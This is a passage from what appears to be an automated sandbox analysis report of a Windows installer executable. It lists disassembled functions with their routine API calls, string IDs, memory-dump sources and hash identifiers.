                                                                                                                                                                                                                                  • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                                                                                                                                  • API String ID: 2238633743-1050967733
                                                                                                                                                                                                                                  • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                                                                                                                                  • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00478C20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                  • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 667068680-222143506
                                                                                                                                                                                                                                  • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                                                                                                                                  • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B508 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041B57E
                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 0041B58A
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                                                                                                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                                                                                                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2502006586-0
                                                                                                                                                                                                                                  • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                                                                                                                                  • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045D04C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                                                                                                                                                  • API String ID: 1452528299-1580325520
                                                                                                                                                                                                                                  • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                                                                                                                                  • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041BD8C Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsDeviceMetricsSystem$Release
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 447804332-0
                                                                                                                                                                                                                                  • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                                                                                                                                  • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401A90 Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(005DE0F0,00000000,00401B68), ref: 00401ACF
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,005DE0F0,00000000,00401B68), ref: 00401AEE
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(005DF0F0,?,00000000,00008000,005DE0F0,00000000,00401B68), ref: 00401B2D
                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                                                                                                                                  • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3782394904-0
                                                                                                                                                                                                                                  • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                  • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047E758 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Long$Show
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3609083571-0
                                                                                                                                                                                                                                  • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                                                                                                                                  • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B270 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                                                                                                                                                                  • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                                                                                                                                                                    • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3527656728-0
                                                                                                                                                                                                                                  • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                                                                                                                                                  • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004538BC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                  • String ID: !nI$.tmp$_iu
                                                                                                                                                                                                                                  • API String ID: 3498533004-584216493
                                                                                                                                                                                                                                  • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                                                                                                                                                  • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00497D5C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                                                                                                                                                                    • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                                                                                                                    • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                                                                                                                                    • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                                                                                                                                                  • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                                                                                                                                  • API String ID: 3312786188-1660910688
                                                                                                                                                                                                                                  • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                                                                                                                                  • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042EAA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                                                                                                                                                  • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                                                                                                                                                  • API String ID: 828529508-2866557904
                                                                                                                                                                                                                                  • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                                                                                                                                                  • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00457FF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
